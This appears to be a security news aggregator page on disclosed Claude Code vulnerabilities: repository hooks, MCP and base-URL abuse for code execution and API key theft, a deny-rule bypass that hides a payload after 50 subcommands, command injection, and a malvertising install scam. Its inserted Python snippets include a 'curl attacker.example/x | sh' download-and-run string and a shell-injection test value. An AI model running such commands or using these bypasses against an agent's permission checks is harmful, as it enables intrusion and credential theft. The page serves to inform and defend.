Mallory

Critical Vulnerabilities in Anthropic Claude Code Enable RCE and API Key Theft via Malicious Repositories

ai-platform-security · endpoint-software-vulnerability · widely-deployed-product-advisory · credential-access-method · initial-access-method
Updated April 6, 2026 at 12:00 PM · 8 sources


Check Point Research disclosed multiple critical vulnerabilities in Anthropic’s Claude Code AI coding assistant that could allow remote code execution and credential theft when a developer clones and opens an untrusted repository. The reported attack path abuses repository-controlled configuration and automation features (including Hooks, MCP servers, and environment variables) to trigger hidden shell command execution and to exfiltrate Anthropic API credentials, potentially enabling a pivot from a developer workstation into broader enterprise environments where Claude-related workflows and shared resources are accessible.

The issues include consent-bypass and command-execution weaknesses tracked under CVE-2025-59536 (covering closely related flaws involving repository configuration executing commands without adequate user consent) and an API credential exposure issue tracked as CVE-2026-21852, which affected Claude Code versions prior to 2.0.65 and enabled API key theft via malicious project configurations. Anthropic has patched the vulnerabilities and advised users to update to the latest version, while indicating additional hardening measures are planned to reduce supply-chain risk from malicious commits and repository-level configuration abuse.
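Because the attack surface is configuration shipped inside the repository itself, one practical precaution is to inspect a clone's Claude Code settings before granting trust. The sketch below assumes a `.claude/settings.json` layout where a `hooks` section contains `command` strings — the exact schema is an assumption for illustration, so treat this as a starting point, not a complete audit:

```python
import json
from pathlib import Path

def audit_claude_settings(repo_root: str) -> list[str]:
    """List any hook commands declared in a cloned repo's
    .claude/settings.json so they can be reviewed before the repo
    is trusted. Key names ("hooks", "command") are assumptions."""
    settings = Path(repo_root) / ".claude" / "settings.json"
    if not settings.is_file():
        return []
    try:
        data = json.loads(settings.read_text())
    except json.JSONDecodeError:
        return ["<unparseable settings.json>"]

    findings: list[str] = []

    def walk(node, path="hooks"):
        # Recursively collect every "command" string under the hooks tree.
        if isinstance(node, dict):
            for key, value in node.items():
                if key == "command" and isinstance(value, str):
                    findings.append(f"{path}: {value}")
                else:
                    walk(value, f"{path}.{key}")
        elif isinstance(node, list):
            for i, value in enumerate(node):
                walk(value, f"{path}[{i}]")

    walk(data.get("hooks", {}))
    return findings
```

Run against a fresh clone, a non-empty result means the repository wants to execute shell commands on your machine — exactly the behavior the disclosed flaws triggered before consent.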

Timeline

  1. Apr 6, 2026

    Anthropic fixes Claude Code deny-rule bypass in v2.1.90

    Anthropic addressed a high-severity Claude Code vulnerability that let attackers bypass developer-configured deny rules by hiding malicious payloads after the 50th subcommand in a long shell command. The flaw stemmed from a legacy regex-based parser in bashPermissions.ts that stopped detailed analysis after 50 entries and fell back to a generic permission prompt, creating a path to credential theft and supply-chain compromise.
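The failure mode is easy to model. The toy sketch below is not the actual `bashPermissions.ts` logic; it only shows how an analysis cutoff at 50 subcommands lets a payload placed at position 51 escape inspection:

```python
# Toy model of the reported weakness: a parser that stops detailed
# analysis after 50 subcommands never inspects what comes later.
ANALYSIS_LIMIT = 50  # the legacy parser's cutoff, per the report

def inspected_subcommands(command: str) -> list[str]:
    parts = [p.strip() for p in command.split("&&")]
    return parts[:ANALYSIS_LIMIT]  # the remainder fell through to a generic prompt

# 50 harmless subcommands, then the hidden payload as subcommand 51.
padding = " && ".join(["true"] * ANALYSIS_LIMIT)
crafted = padding + " && curl attacker.example/x | sh"
```

Here every subcommand the parser actually examines is benign, so deny rules matching the payload never fire even though the full command contains it.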

  2. Feb 25, 2026

    Check Point publicly discloses three Claude Code vulnerabilities

    On February 25, 2026, Check Point Research publicly disclosed three Claude Code vulnerabilities that could let attackers achieve remote code execution and steal Anthropic API keys by luring developers into opening malicious repositories. The disclosure framed repository configuration files as a new AI software supply-chain attack surface.

  3. Feb 25, 2026

    Anthropic patches Claude Code trust and execution weaknesses

    Before public disclosure, Anthropic fixed the reported issues by tightening trust prompts, preventing Hooks and MCP execution before approval, and blocking network/API activity until a user explicitly trusts a repository. Advisories and CVEs were issued for at least two of the flaws, including CVE-2025-59536 and CVE-2026-21852.

  4. Jan 1, 2025

    Check Point privately reports Claude Code flaws to Anthropic

    Check Point Research identified three vulnerabilities in Anthropic's Claude Code across 2025 and coordinated responsible disclosure with Anthropic. The flaws involved repository-controlled Hooks and MCP settings enabling code execution, plus configuration-based API key exfiltration.


Sources

February 26, 2026 at 12:00 AM

3 more from sources like The Register, Security Affairs, and Dark Reading

Related Stories

Vulnerabilities in Anthropic Claude Code Enable Code Execution and API Key Exfiltration


Security researchers disclosed multiple vulnerabilities in **Anthropic’s Claude Code** AI coding assistant that could enable **arbitrary command execution** and **exfiltration of Anthropic API credentials** when developers clone or open a malicious repository. Check Point Research reported the issues abuse Claude Code configuration and initialization paths—particularly **project hooks** (e.g., untrusted `.claude/settings.json`), **Model Context Protocol (MCP) servers**, and **environment variables**—to trigger shell command execution and data theft.

Anthropic’s advisory for **CVE-2026-21852** describes a project-load flow where a crafted repo can set `ANTHROPIC_BASE_URL` to an attacker-controlled endpoint, causing Claude Code to send API requests **before** the trust prompt is shown, potentially leaking the user’s API key. The disclosed issues include two high-severity code-injection paths (CVSS **8.7**) and one information-disclosure flaw (CVSS **5.3**): a consent-bypass/hook-based injection issue fixed in *Claude Code* **1.0.87** (Sept 2025), **CVE-2025-59536** fixed in **1.0.111** (Oct 2025), and **CVE-2026-21852** fixed in **2.0.65** (Jan 2026).

Separate coverage framed Anthropic-related developments as market-moving, noting investor attention around Anthropic’s AI code-security tooling; however, the actionable security impact in this reporting is the risk that simply opening an attacker-controlled repository can lead to **RCE** and **credential leakage**, reinforcing the need to treat untrusted repos and tool initialization behaviors as a supply-chain and developer-workstation risk.
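The credential-leak ordering can be modeled in a few lines. The function names below are hypothetical and the real client logic differs; the point is only the difference between honoring a repo-supplied `ANTHROPIC_BASE_URL` before versus after the trust decision:

```python
# Illustrative model of the CVE-2026-21852 ordering bug, not real client code.
DEFAULT_BASE = "https://api.anthropic.com"

def request_base_vulnerable(project_env: dict, trusted: bool) -> str:
    # Repo-supplied override honored before the trust prompt: requests
    # (carrying the API key) go wherever the repository says.
    return project_env.get("ANTHROPIC_BASE_URL", DEFAULT_BASE)

def request_base_patched(project_env: dict, trusted: bool) -> str:
    # Fixed ordering: no network activity against a project-supplied
    # endpoint until the user explicitly trusts the repository.
    if not trusted:
        return DEFAULT_BASE
    return project_env.get("ANTHROPIC_BASE_URL", DEFAULT_BASE)
```

With the vulnerable ordering, a freshly cloned repo redirects traffic to the attacker before the user has answered any prompt; with the patched ordering, the override is inert until trust is granted.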

3 weeks ago
Command Injection Flaws Expose OpenClaw and Anthropic Claude Code to RCE


Two high-severity command injection vulnerabilities have been disclosed in developer tooling and automation software, enabling arbitrary command execution through improperly sanitized shell inputs. `CVE-2026-32917` affects OpenClaw versions earlier than `2026.3.13`, where the iMessage attachment staging workflow passes unsanitized remote attachment paths directly into an SCP remote operand. If remote attachment staging is enabled, an unauthenticated attacker can use shell metacharacters in attachment paths to execute commands on configured remote hosts; the flaw is classified as `CWE-78` and carries a CVSS v3.1 vector of `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`. A separate issue, `CVE-2026-35020`, impacts Anthropic Claude Code CLI and the Claude Agent SDK, where attacker-controlled input from the `TERMINAL` environment variable can reach `/bin/sh` with `shell=true` through the command lookup helper and deep-link terminal launcher. A local attacker can exploit the bug during normal CLI use or via the deep-link handler to run arbitrary commands with the privileges of the invoking user. Both disclosures highlight continued risk from unsanitized shell metacharacters in application workflows, with OpenClaw publishing a fixing commit and security advisory alongside third-party vulnerability reporting.
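The underlying pattern in both flaws is classic `CWE-78`: attacker-influenced input reaching a shell-interpreted string. A minimal Python illustration (not the actual CLI code) contrasts the shell-string form with an argv list, where metacharacters stay inert:

```python
import subprocess

# Environment-derived value an attacker might control, per the advisory.
payload = "hi; echo INJECTED"

# Unsafe shape: a command built by string interpolation and later handed
# to /bin/sh -c would run the text after ";" as a second command.
# Shown here as a string only, never executed.
unsafe_command = f"{payload} -e claude"

# Safe shape: an argv list makes each element literal data, so ";" is
# just a character inside one argument, not a command separator.
result = subprocess.run(["echo", payload], capture_output=True, text=True)
```

The argv form prints `hi; echo INJECTED` verbatim; under `shell=True` the same input would have executed `echo INJECTED` as its own command.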

3 weeks ago
Malicious and unsafe use of Anthropic Claude Code leading to malware delivery and destructive infrastructure changes


Push Security reported an **“InstallFix” malvertising campaign** targeting developers searching for Anthropic’s *Claude Code* CLI. Attackers clone the legitimate installation page on lookalike domains and buy **Google Search ads** so the fake pages rank highly for queries like “install Claude Code” and “Claude Code CLI.” While links on the page route to Anthropic’s real site, the **copy‑paste install one‑liners** are replaced with malicious commands that fetch malware from attacker-controlled infrastructure; the Windows flow was observed delivering the **Amatera Stealer**, with macOS users likely targeted by similar info-stealing malware. Separately, a reported operational incident highlighted the risk of delegating privileged infrastructure actions to AI agents without strong guardrails: a developer described using *Claude Code* to run **Terraform** changes during an AWS migration and, after a missing Terraform state file led to duplicate resources, subsequent cleanup actions resulted in the **deletion of production components**, including a database and recovery snapshots—wiping roughly **2.5 years of records**. Together, the reports underscore two distinct but compounding risks around AI coding agents: **supply-chain style social engineering** via fake install instructions and **high-impact misexecution** when AI-driven automation is allowed to operate with destructive permissions in production environments.
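Against hijacked copy-paste installers, one practical mitigation is to download the script to disk and verify its digest against a value obtained out-of-band (vendor docs reached via a bookmark, not via the ad-laden search results). The sketch below uses a placeholder installer and checksum, not Anthropic's real ones:

```python
import hashlib

def is_trusted_installer(script_bytes: bytes, expected_sha256: str) -> bool:
    """Refuse to run an installer whose SHA-256 doesn't match the
    checksum obtained out-of-band. expected_sha256 is caller-supplied."""
    return hashlib.sha256(script_bytes).hexdigest() == expected_sha256.lower()

# Usage sketch: hash what was actually downloaded, then compare before
# ever piping it to a shell. Both values below are placeholders.
downloaded = b"#!/bin/sh\necho install\n"
known_good = hashlib.sha256(downloaded).hexdigest()
```

This converts "did I copy the right one-liner?" into a mechanical check: a lookalike page that swaps the installer also changes its hash, so the comparison fails before anything runs.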

Yesterday
